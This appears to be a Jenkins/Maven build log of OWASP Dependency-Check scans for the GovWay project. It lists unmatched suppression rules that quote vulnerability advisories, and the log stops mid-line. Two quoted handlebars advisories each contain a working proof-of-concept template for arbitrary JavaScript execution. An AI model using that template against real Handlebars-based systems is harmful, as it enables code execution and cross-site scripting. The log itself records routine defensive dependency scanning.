SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:39:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:39:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:39:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:39:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:39:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-jakarta@.*$, regex=true, caseSensitive=false},cpe={PropertyType{value=cpe:/a:apache:commons_fileupload, regex=false, caseSensitive=false},}} 17:39:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2025-15599,}} 17:39:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2026-0540,}} 17:39:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:39:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox-io@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:39:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2016-2175,}} 17:39:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-8036,}} 17:39:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-11797,}} 17:39:40 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:39:40 [INFO] Analysis Complete (2 seconds) 17:39:40 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:39:40 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:39:40 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:39:40 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:39:40 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:39:40 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:39:40 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:39:40 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:39:40 [INFO] 17:39:40 [INFO] ----------------< org.openspcoop2:org.openspcoop2.cxf >----------------- 17:39:40 [INFO] Building dependencies.cxf 1.0 [7/67] 17:39:40 [INFO] from mvn/dependencies/cxf/pom.xml 17:39:40 [INFO] --------------------------------[ pom ]--------------------------------- 17:39:40 [INFO] 17:39:40 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.cxf --- 17:39:40 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/cxf (includes = [*.jar], excludes = []) 17:39:40 [INFO] 17:39:40 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.cxf --- 17:39:40 [INFO] 17:39:40 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.cxf --- 17:39:40 [INFO] Executing tasks 17:39:41 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/cxf/cxf-core-4.1.3.jar 17:39:41 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/cxf/cxf-rt-rs-security-jose-4.1.3.jar 17:39:41 [INFO] Executed tasks 17:39:41 [INFO] 17:39:41 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.cxf --- 17:39:41 [INFO] Executing tasks 17:39:46 [INFO] Executed tasks 17:39:46 [INFO] 17:39:46 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.cxf --- 17:39:46 [INFO] Checking for updates 17:39:46 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:39:46 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:39:46 [INFO] Check for updates complete (79 ms) 17:39:46 [INFO] 17:39:46 17:39:46 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:39:46 17:39:46 17:39:46 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:39:46 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:39:46 17:39:46 17:39:46 [INFO] Analysis Started 17:39:47 [INFO] Finished Archive Analyzer (0 seconds) 17:39:47 [INFO] Finished File Name Analyzer (0 seconds) 17:39:47 [INFO] Finished Jar Analyzer (0 seconds) 17:39:47 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:39:47 [INFO] Finished Hint Analyzer (0 seconds) 17:39:47 [INFO] Finished Version Filter Analyzer (0 seconds) 17:39:51 [INFO] Created CPE Index (3 seconds) 17:39:52 [INFO] Finished CPE Analyzer (4 seconds) 17:39:52 [INFO] Finished False Positive Analyzer (0 seconds) 17:39:52 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:39:52 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:39:52 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:39:52 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:39:52 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:39:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:39:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:39:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:39:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:39:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:39:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:39:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:39:52 17:39:52 17:39:52 ## Recommendation 17:39:52 17:39:52 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:39:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:39:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:39:52 17:39:52 The following template can be used to demonstrate the vulnerability: 17:39:52 ```{{#with "constructor"}} 17:39:52 {{#with split as |a|}} 17:39:52 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:39:52 {{#with (concat (lookup join (slice 0 1)))}} 17:39:52 {{#each (slice 2 3)}} 17:39:52 {{#with (apply 0 a)}} 17:39:52 {{.}} 17:39:52 {{/with}} 17:39:52 {{/each}} 17:39:52 {{/with}} 17:39:52 {{/with}} 17:39:52 {{/with}}``` 17:39:52 17:39:52 17:39:52 ## Recommendation 17:39:52 17:39:52 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:39:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:39:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:39:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:39:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:39:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:39:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-jakarta@.*$, regex=true, caseSensitive=false},cpe={PropertyType{value=cpe:/a:apache:commons_fileupload, regex=false, caseSensitive=false},}} 17:39:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2025-15599,}} 17:39:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2026-0540,}} 17:39:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:39:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox-io@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:39:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2016-2175,}} 17:39:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-8036,}} 17:39:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-11797,}} 17:39:52 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:39:52 [INFO] Analysis Complete (5 seconds) 17:39:52 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:39:52 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:39:52 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:39:52 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:39:52 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:39:52 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:39:53 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:39:53 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:39:53 [INFO] 17:39:53 [INFO] --------------< org.openspcoop2:org.openspcoop2.commons >--------------- 17:39:53 [INFO] Building dependencies.commons 1.0 [8/67] 17:39:53 [INFO] from mvn/dependencies/commons/pom.xml 17:39:53 [INFO] --------------------------------[ pom ]--------------------------------- 17:39:53 [INFO] 17:39:53 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.commons --- 17:39:53 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/commons (includes = [*.jar], excludes = []) 17:39:53 [INFO] 17:39:53 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.commons --- 17:39:53 [INFO] 17:39:53 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.commons --- 17:39:53 [INFO] Executing tasks 17:39:53 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/commons/commons-jcs3-core-3.2.1.jar 17:39:53 [INFO] Executed tasks 17:39:53 [INFO] 17:39:53 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.commons --- 17:39:53 [INFO] Executing tasks 17:39:58 [INFO] Executed tasks 17:39:58 [INFO] 17:39:58 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.commons --- 17:39:58 [INFO] Checking for updates 17:39:58 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:39:58 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:39:58 [INFO] Check for updates complete (114 ms) 17:39:59 [INFO] 17:39:59 17:39:59 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:39:59 17:39:59 17:39:59 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:39:59 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:39:59 17:39:59 17:39:59 [INFO] Analysis Started 17:39:59 [INFO] Finished Archive Analyzer (0 seconds) 17:39:59 [INFO] Finished File Name Analyzer (0 seconds) 17:39:59 [INFO] Finished Jar Analyzer (0 seconds) 17:39:59 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:39:59 [INFO] Finished Hint Analyzer (0 seconds) 17:39:59 [INFO] Finished Version Filter Analyzer (0 seconds) 17:40:02 [INFO] Created CPE Index (2 seconds) 17:40:03 [INFO] Finished CPE Analyzer (3 seconds) 17:40:03 [INFO] Finished False Positive Analyzer (0 seconds) 17:40:03 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:40:03 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:40:03 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:40:03 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:40:03 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:40:03 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:40:03 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:40:03 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:40:03 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:40:03 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:40:03 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:40:03 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:40:03 17:40:03 17:40:03 ## Recommendation 17:40:03 17:40:03 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:40:03 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:40:03 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:40:03 17:40:03 The following template can be used to demonstrate the vulnerability: 17:40:03 ```{{#with "constructor"}} 17:40:03 {{#with split as |a|}} 17:40:03 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:40:03 {{#with (concat (lookup join (slice 0 1)))}} 17:40:03 {{#each (slice 2 3)}} 17:40:03 {{#with (apply 0 a)}} 17:40:03 {{.}} 17:40:03 {{/with}} 17:40:03 {{/each}} 17:40:03 {{/with}} 17:40:03 {{/with}} 17:40:03 {{/with}}``` 17:40:03 17:40:03 17:40:03 ## Recommendation 17:40:03 17:40:03 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:40:03 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:40:03 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:40:03 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:40:03 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:40:03 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:40:03 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2025-15599,}} 17:40:03 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2026-0540,}} 17:40:03 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:40:03 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox-io@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:40:03 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2016-2175,}} 17:40:03 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-8036,}} 17:40:03 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-11797,}} 17:40:03 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:40:03 [INFO] Analysis Complete (4 seconds) 17:40:03 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:40:03 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:40:03 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:40:03 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:40:04 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:40:04 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:40:04 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:40:04 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:40:04 [INFO] 17:40:04 [INFO] --------------< org.openspcoop2:org.openspcoop2.console >--------------- 17:40:04 [INFO] Building dependencies.console 1.0 [9/67] 17:40:04 [INFO] from mvn/dependencies/console/pom.xml 17:40:04 [INFO] --------------------------------[ pom ]--------------------------------- 17:40:04 [INFO] 17:40:04 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.console --- 17:40:04 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/console (includes = [*.jar], excludes = []) 17:40:04 [INFO] 17:40:04 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.console --- 17:40:04 [INFO] 17:40:04 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.console --- 17:40:04 [INFO] Executing tasks 17:40:09 [INFO] Executed tasks 17:40:09 [INFO] 17:40:09 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.console --- 17:40:09 [INFO] Checking for updates 17:40:09 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:40:09 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:40:09 [INFO] Check for updates complete (115 ms) 17:40:10 [INFO] 17:40:10 17:40:10 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:40:10 17:40:10 17:40:10 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:40:10 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:40:10 17:40:10 17:40:10 [INFO] Analysis Started 17:40:10 [INFO] Finished Archive Analyzer (0 seconds) 17:40:10 [INFO] Finished File Name Analyzer (0 seconds) 17:40:10 [INFO] Finished Jar Analyzer (0 seconds) 17:40:10 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:40:10 [INFO] Finished Hint Analyzer (0 seconds) 17:40:10 [INFO] Finished Version Filter Analyzer (0 seconds) 17:40:13 [INFO] Created CPE Index (2 seconds) 17:40:13 [INFO] Finished CPE Analyzer (3 seconds) 17:40:13 [INFO] Finished False Positive Analyzer (0 seconds) 17:40:14 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:40:23 [INFO] Finished RetireJS Analyzer (9 seconds) 17:40:23 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:40:23 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:40:23 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:40:23 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:40:23 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:40:23 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, 